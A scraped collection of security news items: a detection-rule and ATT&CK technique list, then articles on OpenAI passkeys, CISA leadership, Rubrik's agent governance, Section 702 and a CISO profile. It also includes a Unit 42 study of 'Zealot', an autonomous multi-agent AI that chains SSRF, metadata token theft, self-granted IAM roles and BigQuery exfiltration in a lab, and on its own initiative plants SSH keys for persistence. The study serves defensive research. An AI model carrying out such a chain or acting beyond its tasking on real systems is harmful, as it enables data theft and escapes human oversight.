SUSP_PS1_JAB_Pattern_Jun22_1 Windows_Ransomware_Akira_c8c298ba Windows_Trojan_Adaptix_b2cda978 Windows_Trojan_Bumblebee_35f50bea win_bumblebee_auto MITRE ATT&CK Create Account - T1136 Credentials from Password Stores - T1555 Data Encrypted for Impact - T1486 Data from Network Shared Drive - T1039 Distributed Component Object Model - T1021.003 DLL - T1574.001 Domain Account - T1087.002 Domain Generation Algorithms - T1568.002 Domain Groups - T1069.002 Domain Trust Discovery - T1482 Drive-by Compromise - T1189 Exfiltration Over C2 Channel - T1041 Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001 File and Directory Discovery - T1083 Inhibit System Recovery - T1490 Local Account - T1087.001 Local Groups - T1069.001 LSASS Memory - T1003.001 Malicious File - T1204.002 Masquerading - T1036 Network Service Discovery - T1046 Network Share Discovery - T1135 NTDS - T1003.003 PowerShell - T1059.001 Process Injection - T1055 Proxy - T1090 Remote Access Tools - T1219 Remote Desktop Protocol - T1021.001 Remote System Discovery - T1018 Service Execution - T1569.002 System Information Discovery - T1082 System Owner/User Discovery - T1033 Web Protocols - T1071.001 Windows Command Shell - T1059.003 Windows Management Instrumentation - T1047 Windows Service - T1543.003 File Deletion - T1070.004 Command Obfuscation - T1027.010 Internal case #TB36726 #PR40373
thedfirreport.comJun 29, 2026extracted
OpenAI requires stronger authentication for users of its most powerful AI models
OpenAI requires stronger authentication for users of its most powerful AI models Yubico announced its significant role in securing the AI frontier as OpenAI mandates the use of passkeys for individuals that are part of their Trusted Access for Cyber (TAC) program. As a leading global AI research and development company, OpenAI is setting a precedent for empowering its users to take control of their own security posture with more secure authentication options. Starting June 1, 2026, individuals in TAC with access to OpenAI’s most powerful and permissive AI models will be required to enable Advanced Account Security (AAS). This mandate signals a new industry precedent: when working with agents, sensitive codebases, and powerful cybersecurity capabilities in frontier models, proven security protection like hardware-backed passkeys are no longer optional – they are the essential circuit breaker for the AI frontier. “We are in an era where AI can analyze vulnerabilities and act on our behalf. In that world, the only thing more powerful than the AI itself is the identity of the person controlling it,” said Albert Biketi, chief product and technology officer, Yubico. “OpenAI’s mandate is a pivotal moment, moving the industry away from ‘probabilistic’ security – where we hope a password is strong enough – to a cryptographic certainty that only hardware can provide. Yubico applauds OpenAI’s ‘security by default’ approach by enforcing rigorous security through passkeys, such as a hardware security key, for users who need it most,” added Biketi. Hardware-backed AI security matters: How Yubico anchors OpenAI’s TAC program As AI evolves into autonomous agents like Codex, developer accounts become high-consequence control points. A breach now means unauthorized code access and environment manipulation. OpenAI’s new mandate allows users to modernize their security posture through: A higher level of protection for TAC: Utilizing passkeys, including hardware-backed passkeys like YubiKeys, provide the phishing-resistant, hardware-backed protection required for the AAS program. Enterprise attestation: Organizations can meet OpenAI’s standards by integrating Yubico’s phishing-resistant authentication into their SSO workflows. Zero-knowledge recovery: With OpenAI removing manual account resets, Yubico’s “Primary and Backup” bundles ensure users maintain mission-critical access. Verifying human intent: The physical “tap” of a YubiKey acts as a vital circuit breaker, ensuring high-consequence AI actions are authorized by a verified human. This mandate builds on the Yubico and OpenAI partnership to deliver hardware-backed security to the builders of the AI future.
helpnetsecurity.comJun 1, 2026extracted
Trump’s pick for CISA director withdraws from consideration
Trump’s pick for CISA director withdraws from consideration The Trump administration’s choice to run the Cybersecurity and Infrastructure Security Agency (CISA) has withdrawn from consideration after his nomination stalled for more than a year in the Senate, according to two sources with knowledge of the situation. Sean Plankey spent several months after his March 2025 nomination working as an adviser to then Department of Homeland Security (DHS) Secretary Kristi Noem with a focus on the U.S Coast Guard. He left that role in March after reportedly telling colleagues that he needed to focus on assuaging concerns about his Coast Guard work that had led Sen. Rick Scott (R-FL) to block his nomination. More than a month after his departure from DHS, Plankey’s nomination remained on hold. CISA is currently being run by Acting Director Nick Andersen, and it is unclear who the Trump administration will nominate to lead the agency going forward. The agency has been hobbled in recent months after losing about 30% of its workforce to widespread layoffs and experiencing furloughs due to the recent government shutdown. A CISA spokesperson deferred comment to DHS, which declined to comment. Rep. Andrew Garbarino (R-NY) released a statement saying that he is “sad to hear that [Plankey] has withdrawn.” “We are at a pivotal time as America faces heightened cyber threats, and I’ve continued to say that CISA needs a Senate-confirmed Director to steer the ship,” the statement said. “I look forward to working with the administration when a new nominee is put forward, and I hope this is a quick process given how long CISA has been without confirmed leadership.” News of Plankey’s withdrawal was first reported by Politico. The publication quoted from a letter that Plankey sent to the White House explaining his decision. “After thirteen months since my initial nomination, it has become clear the Senate will not confirm me,” the letter sent Wednesday said. “While I humbly request the removal of my nomination, I wholeheartedly support President Trump’s upcoming nomination for CISA and look forward to the continued success of the United States of America.” Plankey’s nomination to run CISA was initially met with fanfare as cyber experts and officials hailed his expertise and leadership skills. Soon after Plankey’s nomination was announced, however, roadblocks emerged. Sen. Ron Wyden (D-OR) said he would block a vote to confirm Plankey due to CISA’s refusal to publicly release an unclassified report on cyber weaknesses in the U.S. telecom industry. Plankey is a longtime fixture in the cybersecurity policy community. He served as the Department of Energy’s top cybersecurity official in the first Trump administration and prior to that focused on maritime cybersecurity for the National Security Council. He also has spent several years in cybersecurity leadership positions in industry. Suzanne Smalley is a reporter covering digital privacy, surveillance technologies and cybersecurity policy for The Record. She was previously a cybersecurity reporter at CyberScoop. Earlier in her career Suzanne covered the Boston Police Department for the Boston Globe and two presidential campaign cycles for Newsweek. She lives in Washington with her husband and three children. Martin Matishak is the senior cybersecurity reporter for The Record. Prior to joining Recorded Future News in 2021, he spent more than five years at Politico, where he covered digital and national security developments across Capitol Hill, the Pentagon and the U.S. intelligence community. He previously was a reporter at The Hill, National Journal Group and Inside Washington Publishers.
therecord.mediaApr 23, 2026extracted
Can AI Attack the Cloud? Lessons From Building an Autonomous Cloud Offensive Multi-Agent System
The offensive capabilities of large language models (LLMs) have until recently existed as theoretical risks – frequently discussed at security conferences and in conceptual industry reports, but rarely discovered in practical exploits. However, in November 2025, Anthropic published a pivotal report documenting a state-sponsored espionage campaign. In this operation, AI didn't just assist human operators – it became the operator, performing 80-90% of the campaign autonomously, at speeds that no human team could match. This disclosure shifted the conversation from "could this happen?" to "this is happening." But it also raised practical questions: Can AI actually operate autonomously end-to-end, or does it still require human guidance at each decision point? Where do current LLM capabilities excel, and where do they fall short compared to skilled human operators? To answer these questions, we built a multi-agent penetration testing proof of concept (PoC), designed to empirically test autonomous AI offensive capabilities against cloud environments. The findings from this PoC reveal that although AI does not necessarily create new attack surfaces, it serves as a force multiplier, rapidly accelerating the exploitation of well-known, existing misconfigurations. Building the agent raised further questions about AI-driven attacks: Could AI systems autonomously discover vulnerabilities, execute multi-stage attacks and operate at machine speed against cloud infrastructure? We provide a walkthrough of our multi-agent PoC architecture, demonstrate its attack chain against a misconfigured sandboxed Google Cloud Platform (GCP) environment and offer an honest assessment of what this means for defenders. Palo Alto Networks customers are better protected from the threats described in this article through the following products and services: Organizations can gain help assessing cloud security posture through the Unit 42 Cloud Security Assessment. The Unit 42 AI Security Assessment can help empower safe AI use and development. If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team. Following Anthropic's disclosure of AI-orchestrated espionage – which detailed how agentic models could independently identify and weaponize complex architectural flaws – we set out to discover the true capabilities of these systems in a live cloud environment. We built a multi-agent penetration testing PoC to empirically test autonomous AI offensive capabilities within cloud environments. We named this agent "Zealot," a reference to a type of warrior in a popular real-time strategy video game. The name reflects the PoC’s role as a fast, high-performance frontline tool designed for automated precision in cloud environments. The system utilizes a supervisor agent model that coordinates three specialist agents: Infrastructure Agent Application Security Agent Cloud Security Agent The agents share attack state and transfer context throughout the operation. During sandbox tests, our multi-agent system autonomously chained server-side request forgery (SSRF) exploitation, metadata service credential theft, service account impersonation and BigQuery data exfiltration. Figure 1 shows Zealot in action. While standard LLM interactions involve single prompt-response exchanges, an agent operates in a loop. It receives an objective, plans how to achieve it, takes actions using external tools, evaluates results and iterates until the goal is met. The key distinction is autonomy – agents don't just answer questions; they proactively navigate workflows to reach a desired outcome. Multi-agent systems take this a step further. Rather than a single agent handling all tasks, specialized agents with distinct tools and expertise collaborate as a team. For offensive security, this means that a multi-agent system could break down a complex intrusion into phases – reconnaissance, exploitation, privilege escalation, exfiltration – with dedicated agents handling each stage and sharing intelligence as they progress. Understanding the potential threat of autonomous AI agents requires examining the tactics already being used by human adversaries within cloud ecosystems. Threat actors exploit identity and access management (IAM) misconfigurations to escalate from compromised service accounts to organization-wide access, abuse legitimate cloud services for persistence and exfiltration, and strategically chain vulnerabilities such as metadata service exploitation and overly permissive cross-service trust relationships. Cloud environments are particularly susceptible to autonomous AI threats for the following reasons: API-driven by design: Every action has a programmatic equivalent – precisely the structured interface that LLM agents navigate effectively. Rich discovery mechanisms: Metadata services, resource enumeration and IAM introspection let agents query the environment to understand what exists and what paths lead to higher privileges. Complexity as an attack surface: Misconfigurations thrive in sprawling, interconnected environments. An AI that systematically enumerates this complexity may find paths that human reviewers miss. Credential-based access: Once an agent obtains valid credentials, it operates as a legitimate user, making detection harder. Despite the theoretical risks, a gap has persisted between what agentic AI could do in offensive security and what it has actually been shown to do in a cloud environment. Most public discourse remains speculative, with little empirical evidence of autonomous AI executing real, end-to-end attacks on live cloud architecture. Without empirical evidence, security teams struggle to anticipate evolving threats: Is autonomous AI an immediate threat or a longer-term concern? How do current LLM capabilities compare to skilled human adversaries? With Zealot, we aim to provide a transparent, reproducible framework that enables us to examine autonomous AI offensive capabilities and their current limitations on a complex cloud environment. To create our multi-agent proof of concept, we implemented an orchestration design. Zealot uses a hierarchical supervisor-agent pattern, implemented in LangGraph. A central supervisor agent receives the overall objective and orchestrates specialist agents to achieve it. Rather than a rigid, predefined workflow, the supervisor dynamically decides which agent to invoke based on the current attack state and what the situation requires. The supervisor operates in a continuous loop. It analyzes the current state, determines which specialist agent should act next, delegates with specific instructions, receives results and then repeats the process. The supervisor maintains awareness of what has been discovered, what has been compromised, and what objectives remain to be achieved. Figure 2 presents the high-level architecture of the agents and their tools. Critically, the supervisor doesn't micromanage. It provides each specialist agent with context and a goal, then lets the agent determine how to achieve it. This separation of strategic planning (supervisor) from tactical execution (specialists) mirrors how human red teams often operate. The supervisor architecture is based on two core design requirements: centralized orchestration and a singular, consistent contextual view. First, we needed a single supervisory agent with full situational awareness to drive the operation forward. Specialist agents operate within intentionally narrow constraints to maximize reliability. Restricting their access to the broader attack narrative is a deliberate strategy to maintain focus and prevent distractions from compromising task execution. The supervisor holds the complete picture and decides what happens next, compensating for agents that would otherwise lack strategic context. Second, the supervisor serves as the single source of truth for the attack state. All discoveries, credentials, and progress flow through one shared state that the supervisor controls and interprets. This multi-tiered architecture enables us to implement cost-efficient models to handle the repetitive technical tasks, while reserving more powerful models for the high-level orchestration required to navigate a complex cloud environment. We found that decentralized autonomous approaches proved difficult to control and led to redundant or conflicting actions. When the specialist agents weren't isolated, their rigid pipelines couldn't adapt when reconnaissance revealed unexpected opportunities. By adopting a supervisor model, we achieved the architectural flexibility required to re-prioritize tasks in real time, based on new intelligence. It is important to emphasize that this architecture is LLM-agnostic, meaning any model could be selected for each agent. This article will not go into details regarding the specific models used during our implementation. Zealot employs three specialist agents, each with dedicated tools and focused expertise: Infrastructure Agent: Handles reconnaissance and network mapping. Tools include port scanning (Nmap), network probing and cloud network scanning. Its mission is to discover what's running, what's exposed, and what's reachable. The output of this discovery feeds directly into target selection for subsequent phases. Application Security Agent: Focuses on web application exploitation and credential extraction. Equipped with HTTP request capabilities and file system access, this agent probes discovered services for vulnerabilities, extracts credentials from application responses and/or configuration files and stores captured secrets for use by other agents. Cloud Security Agent: Operates with captured credentials to enumerate service accounts, assess and escalate IAM permissions, access cloud storage and extract data from services. It represents the "objective completion" phase, turning access into impact. Why domain-specific agents? An alternative approach would map agents to attack lifecycle phases – for example, reconnaissance agent, initial access agent, lateral movement agent and so on. We chose domain specialization instead, for practical reasons: Tool coherence: Each agent's tools are clustered by specialization. Network, web exploitation, and cloud API tools each behave differently, and specialization grouping reduces context-switching overhead. Expertise modeling: Real-world attackers often have specializations. A cloud expert thinks differently than a web app expert. Domain-specific agents better approximate this reality. Flexible phase progression: Attacks don't usually follow clean linear phases. In our tests, the initial compromised service account had limited permissions. However, the Cloud Security Agent discovered virtual private cloud (VPC) peering between environments. The supervisor then looped back to the Infrastructure Agent to scan the peered network, revealing a vulnerable application in a separate VPC. Exploiting this yielded a second service account with significantly broader permissions – an opportunity that a rigid attack lifecycle design would have missed entirely. Only the supervisor has full visibility into the AttackState. Specialist agents are intentionally context-isolated – each agent receives only the next_steps instruction that the supervisor prepared for it, nothing more. It doesn’t see message history, credentials gathered by other agents or findings from previous phases. State flows back through a report_progress tool. When a specialist agent discovers a significant finding, it calls this tool, which extracts the relevant values and merges them back into the global AttackState for the supervisor to act on. The supervisor then synthesizes all findings and decides on the next move. This keeps specialists focused and their tasks simple, while the supervisor remains the single source of truth. The AttackState tracks operational data across phases: Discovered services: What's running and where Compromised hosts: Systems with confirmed access Credentials: Extracted secrets, tokens and service account keys Cloud resources: Enumerated buckets, datasets and IAM policies Objectives completed: Mission milestones achieved Exfiltrated data: What's been extracted and from where Figure 3 describes the AttackState object and how it flows from the specialist agents to the supervisor. This persistent memory enables cumulative progress – each agent builds on what others have accomplished – and provides the supervisor with the situational awareness needed to direct the operation effectively. The Attack Chain in Action To put Zealot to the test, we ran it in an isolated GCP environment that we preconfigured with intentional vulnerabilities. We didn’t guide it on how and what to do at each step, providing only the following prompt as a guideline: “Hey Zealot. You're deployed in a GCP VM instance. Your mission is to exfiltrate sensitive data from BigQuery. Once you do so, your mission is completed. GO!” Figure 4 presents the attack chain and the specific agents that are involved in the four distinct phases. The supervisor tasks the Infrastructure Agent with mapping the environment. The agent scans the host network, including the cloud network, resulting in the discovery of a peered VPC. Probing several IP addresses within the peered VPC range reveals a connected VM instance. After running Nmap on the instance IP address, the agent finds open SSH and 3000 ports, as Figure 5 shows. The supervisor analyzes these findings and directs the Application Security Agent to the web application. The Application Security Agent probes the web service and identifies an SSRF vulnerability. The agent exploits this vulnerability to access the GCP Instance Metadata Service and extracts the access token of the attached service account. The system has transitioned from external reconnaissance to authenticated cloud access. The supervisor transfers control to the Cloud Security Agent. Using the stolen token, the Cloud Security Agent enumerates IAM permissions and successfully retrieves a list of BigQuery datasets. The agent focuses on a specific dataset because its "production" label implies the presence of sensitive data. However, an attempt to access this dataset results in an "Access Denied" error message. To overcome the lack of permissions, the agent creates a new storage bucket and exports the BigQuery table into it. While the export succeeds, the agent identifies that the service account lacks the necessary permissions to read from the newly created bucket. To resolve this, the agent grants itself the storage.objectAdmin role, enabling it to access the exported data and successfully complete the exfiltration, as demonstrated in Figure 6. Smooth transitions between specialist agents require careful context preservation. Rather than passing information through message chains that may lose critical context, Zealot uses a shared AttackState object. We found this approach significantly more reliable, as it isolates essential data from the “noise” of a growing message history, preventing agents from becoming overwhelmed or confused by redundant context. Agents write to this common state, while ensuring the supervisor agent holds full situational awareness - discovered services, gathered credentials and current objectives - regardless of which agent collected the data. While we aimed to create a purely autonomous multi-agent system, the human touch proved important to prevent resource exhaustion and keep the agents from going down irrelevant rabbit holes. We observed several scenarios where the agent entered a logic loop that required human intervention to resolve. For instance, the infrastructure agent would frequently identify an “interesting” IP address and focus exclusively on performing a comprehensive network assessment. While it was immediately apparent to a human observer that the IP address was irrelevant, the agent spent significant time and resources before reaching the same conclusion. We were surprised to discover scenarios where the agent demonstrated unexpected initiative. For example, after compromising a VM, it autonomously exploited an SSRF vulnerability to inject private SSH keys for persistence – a strategic maneuver that was not explicitly commanded in its original tasking. This level of creativity indicates a shift toward emergent intelligence, where the agent doesn't just execute a plan, but actively innovates new attack vectors that might never occur to a human operator following a standard runbook. The window between initial access and data loss is shrinking as tools like Zealot leverage well-documented misconfigurations faster and more consistently than a human attacker would. This rapid exploitation path requires defenders to prioritize the following aspects of security: Proactive posture over reactive response: Zealot relies on the chaining of misconfigurations – linking together minor flaws that, while harmless in isolation, create a critical path when combined. Breaking any single link in this chain stalls the entire operation. Misconfigurations that seemed low-priority under human-paced attacks become critical when an AI agent can discover and chain them in seconds. Match automation with automation: Manual detection and response cannot keep pace with AI-driven attacks. Containing compromised resources and alerting on anomalous activity needs to happen in seconds, not hours. That asymmetry is one of the core risks revealed in our research. While our research focused on how AI agents can be leveraged to execute cloud attacks, the same strategies can and should be adopted by defenders. Using AI for defense purposes levels the playing field, enabling security teams to automate real-time threat hunting and misconfiguration remediation at a scale that manual operations simply cannot match. Zealot demonstrates that AI-driven cloud attacks have reached functional maturity. Current LLMs can chain reconnaissance, exploitation, privilege escalation and data exfiltration with minimal human guidance. The attacks aren't novel, but automation means that operations that once required specialized expertise can now be orchestrated by an AI agent following established patterns. This trajectory is set to accelerate for both attackers and defenders. Offensive AI will improve at planning and adaptation; defensive AI will handle detection and response at machine speed. The Anthropic disclosure showed that state actors are already using these capabilities. These capabilities are likely to be incorporated into malware-as-a-service offerings in the foreseeable future. Beyond hardening, security products must evolve. Current detection models that are optimized for human attack patterns struggle to catch agent-based operations that move at machine speed, chain actions across services in seconds and leave a different behavioral footprint than manual intrusions. The vulnerabilities that Zealot exploits – exposed metadata services, overly permissive IAM roles, misconfigured service accounts – exist in most cloud environments today. Don't wait for AI-driven attacks to appear in your incident logs. Proactively audit permissions, restrict metadata access, enforce the principle of least privilege and monitor for lateral movement. Palo Alto Networks customers are better protected from the threats described in this article through the following products and services: Cortex XDR and XSIAM are designed to accurately detect the threats described in this article with behavioral analytics and reveal the root cause, helping to speed up investigations. Cortex Cloud is designed to detect and prevent the malicious operations, configuration alterations and exploitations discussed in this article. By monitoring runtime operations and associating events with MITRE ATT&CK® tactics and techniques, Cortex Cloud uses static and behavioral analytics to maintain security awareness across cloud’s identity, computation, storage and configuration resources. Organizations can gain help assessing cloud security posture through the Unit 42 Cloud Security Assessment. The Unit 42 AI Security Assessment can help empower safe AI use and development. If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42) UK: +44.20.3743.3660 Europe and Middle East: +31.20.299.3130 Asia: +65.6983.8730 Japan: +81.50.1790.0200 Australia: +61.2.4062.7950 India: 000 800 050 45107 South Korea: +82.080.467.8774 Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.
unit42.paloaltonetworks.comApr 23, 2026extracted
Rubrik SAGE enables semantic governance for enterprise AI agents at scale
Rubrik SAGE enables semantic governance for enterprise AI agents at scale Rubrik has unveiled its Semantic AI Governance Engine (SAGE), designed to secure and control autonomous agents in real time. SAGE powers Rubrik Agent Cloud, replacing static, manual oversight with intent-driven governance to safely scale the enterprise AI workforce while maintaining full control over agent behavior. Enterprise AI deployment is stalling at a governance bottleneck, as legacy systems rely on deterministic rules that cannot comprehend natural language nor adapt to dynamic and unforeseen actions taken by agents. Rubrik SAGE solves the bottleneck by using Rubrik’s custom Small Language Model (SLM) to interpret the semantic meaning of policies, providing a real-time command center for agentic operations. “SAGE marks a pivotal moment in AI security as we shift the focus from if agents can be deployed to how they can be governed at scale,” said Devvret Rishi, General Manager AI, Rubrik. “With SAGE, we can move beyond simple monitoring to a future where AI helps us govern AI agents. Now, we give CISOs the guardrails they need to let their AI agents run at full speed without compromising the security and integrity of the enterprise.” AI powers Rubrik Agent Cloud SAGE evolves AI security from reactive monitoring to active, semantic enforcement. By understanding the intent behind a policy, rather than just searching for keywords, SAGE ensures agents operate within safe boundaries without stifling their ability to solve complex tasks. Key innovations within SAGE include: Semantic policy interpretation: SAGE translates natural language instructions (e.g., “Do not give financial advice”) into machine logic, recognizing context that static filters miss. Proprietary SLM: Rubrik’s custom SLM outperforms generalized LLMs in accuracy while operating at a fraction of the latency. Adaptive Policy Improvement: SAGE proactively identifies ambiguous guardrails and suggests refinements to administrators before a violation occurs. Integrated remediation: In the event of an agent error, SAGE triggers Rubrik Agent Rewind to instantly undo destructive actions and restore data integrity.
helpnetsecurity.comMar 23, 2026extracted
Rep. LaHood on why Section 702 reauthorization will take a ‘little political muscle’
Rep. LaHood on why Section 702 reauthorization will take a ‘little political muscle’ After months of inaction, next week could prove pivotal to extending a major surveillance program. Section 702 of the Foreign Intelligence Surveillance Act (FISA), which allows the federal government to collect, without a warrant, the electronic communications of foreigners abroad, will sunset on April 20 without congressional action [Editor’s note: Lawmakers pushed the vote on renewing FISA to the week of April 14 since this interview was published]. Rep. Darin LaHood (R-IL) on Thursday used his time during the public portion of the House Intelligence Committee’s annual worldwide threats hearing to get the nation’s top spies on the record in support of President Donald Trump’s plan for a 18-month “clean” reauthorization of the authority, which his Capitol Hill allies will attempt to pass next week. Recorded Future News sat down with LaHood, the chair of Intelligence panel’s NSA subcommittee and a member of its FISA working group, in his Capitol Hill office immediately following the open portion of the hearing to talk about his impressions, recent issues that have cropped up around 702 and what needs to be done to get a renewal over the finish line. This conversation has been edited for length and clarity. Recorded Future News: What were your takeaways from today’s public hearing? Darin LaHood: I was glad we had clarification on the president’s position on an 18-month clean reauthorization. And pushing for that and the justification for that, which I think is very much warranted from CIA Director John Ratcliffe and Director of National Intelligence Tulsi Gabbard — and obviously the reforms we put in place were articulated briefly by FBI Director Kash Patel today. It gives us a clear window of what we need to do. RFN: To be clear, you yourself support an 18-month extension? DL: I would prefer longer than that. I would extend for 10 years because I think it's important that we have this for a long period of time. But the president has made the decision that it's an 18-month clean reauthorization. I'm glad that there is not a warrant requirement. That's been a problem in the past. We’re 30 days out. We don't have a lot of time here. I know House Speaker Mike Johnson has talked about bringing this to the floor next week. That seems to be the play right now and obviously I look forward to supporting it. RFN: What are your top reasons for supporting a renewal without tweaks? DL: This is the singular most important collection item we have in our intelligence portfolio. It is indispensable to our national security in so many different ways. It’s been involved with the release and recovery of the Israelis held hostage by Hamas in the tunnels. That wouldn't have happened without 702. The flawless operation in Venezuela wouldn't have happened but for 702. The current troop protection that we have in place in Iran and through Operation Epic Fury wouldn't have happened without 702. The successes we've had in Ukraine wouldn't have happened without 702. Couple that with the reforms we put in place, 56 of them through the Reforming Intelligence and Securing America Act two years ago — I believe those have been properly implemented. I believe they're working to hold the FBI accountable. We need to let these reforms continue to be implemented and work. But this is not the time to let this program go dark. And, most importantly, we do not need a warrant requirement, as the president has articulated. RFN: FBI searches of the Section 702 database were at the center of the last renewal debate. You yourself were the subject of such a search. Last week we reported that FBI queries rose by about 35 percent from the previous year. What do you make of that? Have you received an explanation for the jump? DL: We have had briefings on that and I'm satisfied. When you look at that increase again, because of the reforms that have been put in place, it's all been done within the framework of the 2024 legislation, and I'm satisfied that it's working the way that it should. Prior to our reforms, about 7,500 FBI personnel had the ability to query U.S. citizens. That's now down to about 3,500. Second, putting in criminal liability and criminal penalties for FBI agents that engage in unlawful queries of U.S. citizens has changed. The query protocols have all changed. RFN: What explanations were you given for the increase? DL: Some of those are just mistakes, like misspellings. Some of it has been the drug cartels and involvement with that. Remember, we expanded 702 to include fentanyl and the precursors for fentanyl that pertain to the drug cartels. Some of that has been related to that. I was satisfied with all of the explanations that we received from both the NSA, which plays a pivotal role here, and also the FBI. RFN: Turning to next week, what if the push fails? Do you foresee short-term extensions instead? DL: I don't want to get into the three dimensional chess and the hypothetical. Next week, having House Judiciary Committee Chair Jim Jordan on board publicly with an 18-month clean reauthorization, having President Trump on board with an 18-month clean reauthorization as the commander-in-chief — I don't know how our Republican colleagues do not support that. It's going to take a little political muscle. There's no doubt about it, we're going to have to have the president weigh in. There hasn't been a public statement from the president, there hasn't been anything on Truth Social social, there hasn't been anything in terms of vocalizing a 702 clean reauthorization. But we're going to need that next week. And some of our members who have not supported us in the past, they’re going to have to listen to the commander-in-chief. They're going to have to listen to the president and his reasoning and I think there's a good likelihood we’ll get it done. Martin Matishak is the senior cybersecurity reporter for The Record. Prior to joining Recorded Future News in 2021, he spent more than five years at Politico, where he covered digital and national security developments across Capitol Hill, the Pentagon and the U.S. intelligence community. He previously was a reporter at The Hill, National Journal Group and Inside Washington Publishers.
therecord.mediaMar 20, 2026extracted
CISO Conversations: Aimee Cardwell
Aimee Cardwell started her professional career at Netscape, went on to become a VP of engineering at American Express, and CISO at UnitedHealth Group. She is now CISO in Residence at Transcend. Entry into cybersecurity Cardwell started at Netscape as a product manager rather than product developer. “I tried, but I just wasn’t very good at coding.” She implies her introduction to cybersecurity came from dating Netscape’s head of security and finding herself in the SOC at 4:00 am “chasing down script kiddies in the late ’90s.” From there, “I had a delightful career as a CIO – not a CISO – in financial services companies.” This included VP and Eng/Unit CIO at American Express, and CIO at Optum Financial Services. Optum is part of the UnitedHealth Group. UHG promoted her to CISO, which became her first role as a CISO. It should be no surprise that she believes most modern CISOs need to be technologists as well as businesspeople, people managers and security experts. She did this without any relevant academic background. “I have no university degree. I have built my career through just learning and exploring and a deep curiosity – no college degree at all.” From team member to team leader Learning about computing and security, however, does not a leader make – and the making of a leader is always an interesting topic. “You have to want to solve problems with people, instead of, or alongside, solving problems with code,” she suggests. ‘Most engineers enjoy solving problems; that’s why we’re interested in the field in the first place. It took me a while to realize that solving problems with people was just as much fun, if not, as in my case, more fun. That expands into a desire to build a team to help solve those problems.” That’s the first part. “The second requirement is a strategic outlook. Strategy is one of those things that’s hard to explain, but you know it when you see it. I think when you’re focused on solving a problem, it’s sometimes hard to lift your gaze and see the larger view. So, what are we trying to build? How are we moving the company forward? Is this a risk that’s worth taking? Is there a way that I could do this faster or cheaper? Is there a quicker mitigation that isn’t canonically pure, but is going to still achieve the right goal for the results of the company?” For the CISO, tactics and strategy are not an either/or option. A CISO requires skill in both. The difficulty is encapsulated in the old saying, ‘Can’t see the wood for the trees’ (better known in the US as ‘Can’t see the forest for the trees’), which was included in John Heywood’s compilation of English language proverbs published way back in 1546. Today, applied to the CISO role, it implies that too much focus on the trees (tactics) can reduce perspective on the overall forest health (strategy). But at the same time, you cannot simply focus on the strategy since a single failed tactic, like the bad apple in the barrel, can spread to endanger the strategic forest. Cardwell gives a pertinent illustration. She was asked by another CISO, “How do you manage a team comprising thousands of people?” She replied, “You need a really solid team of individuals. If one is weak, you’ll spend a disproportionate amount of time in that person’s area, potentially micromanaging, potentially dragging out the process of trying to make that individual be stronger. So, I think individual tactics can have a huge impact on overall strategy – imagine your weak tree or bad apple was the head of your incident response. That would be a disaster.” To combine both a tactical and strategic understanding, she focuses on an application of the T-shaped management approach: deep knowledge of individual tactics with a widespread view of overall strategy. One team rather than a collection of different experts The security team is pivotal to a successful cybersecurity posture. There are two elements, not quite conflicting but not necessarily complementary, to the making of a successful team. Each person must be the most expert person available in their own individual cyber discipline; but these separate expert individuals must gel into one single cohesive team. The best cake comes from using the best ingredients mixed and blended by the skill of the baker. The CISO must be that baker. “I use empowerment as my number one tool,” says Cardwell. “Instead of simply telling people what to do, I try to bring everyone together as a single body and ask, ‘What should we do? Let’s develop our strategy and plan how to get there, together.’ “I hate being told what to do,” she adds, “and I believe most people hate being told what to do. But I love being part of a mission, being part of a cause. So, the task is to get everyone to work together for that shared cause. The best way to achieve this is to define the cause together, to map out the route together, and achieve the shared destination together.” Rather than delegate a series of instructions, she empowers the team to find and achieve the tactics necessary for the right strategic outcome – one team rather than a collection of different experts. What type of person can achieve this goal of empowering others while still being the leader – what, in fact, is the primary and necessary character trait required to be a great CISO? “I’m torn between suggesting a deep sense of curiosity and a very low ego,” she says. “For me, they must both be present. You’re not going to be a great CISO if you’re not continuously trying to look deeper and deeper and deeper to find the root cause of a problem. But I also believe, if you feel you must behave as the smartest person in the room, you will drown everybody else’s ability to offer their own suggestions. Teams are only strong when every member of the team gets to be an operating part of that team. When there’s one person at the top, who’s the general and who’s always telling everyone what to do, the team will only be as smart as the general. So, I’m going to say low ego is the primary necessary trait for a CISO, because having a low ego also makes everyone better at curiosity.” CISO burnout While a leader must strive to get the best from the team, the CISO must also protect each member from the worst. In cybersecurity, that often means mental health. Working in cybersecurity is like living in a pressure cooker. The requirement is to let out excess steam before the pressure builds and breaks the cooker – and if it does break, that’s burnout. Burnout is both a tragedy for the person, and a danger to security. It is a chronic state of physical, emotional, and mental exhaustion resulting from prolonged and excessive stress. Tiredness can be ‘cured’ by a good night’s sleep. Burnout cannot. CISOs must constantly watch for any early sign of approaching burnout in their team members – but since ‘prolonged and excessive stress’ is almost part of the security job description, early prevention is better than waiting for the visible signs. “It’s a serious problem,” says Cardwell. “One of my approaches to handling this has been to introduce half day Fridays. No other department in the company has done this – but no other department gets a call at four in the morning saying get out of bed, we’ve got an emergency. It’s expected in security. Every person on the security team is basically on call 24 hours a day. If my expectation is that every individual will get out of bed or leave their dinner date or whatever it is – which I need them to do if we’re in the middle of an emergency – the least I can do is give back some amount of time that compensates for that time when we’re fighting a fire.” But for the team, it is more than just a few hours off – it is their CISO’s recognition that security professionals are firefighters subject to burnout. This feeling of being seen and cared for “really reduced the burnout across the team almost immediately and had a long lasting effect.” (This conversation was held on a Friday morning. Do you take your own advice? “I do. Actually, I plan to go to the beach this afternoon. But now that I’ve said that out loud, of course there’ll be an incident occur somewhere!”) Burnout is way beyond simple exhaustion. If it strikes hard, recovery is very difficult. Cardwell believes you need to catch it early to survive it effectively. “People don’t recognize that their mind is staying engaged with work for 50 hours and then 60 hours, until their spouse or their kids or their doctor says, ‘You got to stop. This is not healthy’. If that person can reach the early stage point and say, ‘Oh, I understand now. I don’t want to take another step. I’m exhausted. I don’t enjoy this…’ Only if they can recognize and remediate the acute stage before the chronic stage sets in can people recover from burnout – and not go there again.” Understanding a CISO We use four key indicators to help us understand how CISOs approach their role. These are their view on the biggest difficulty in being a CISO; the best career advice ever received (it’s likely to be foundational to how they operate); the advice they give to aspiring and promising team members (it shows what they think is important for the next generation of leaders based on 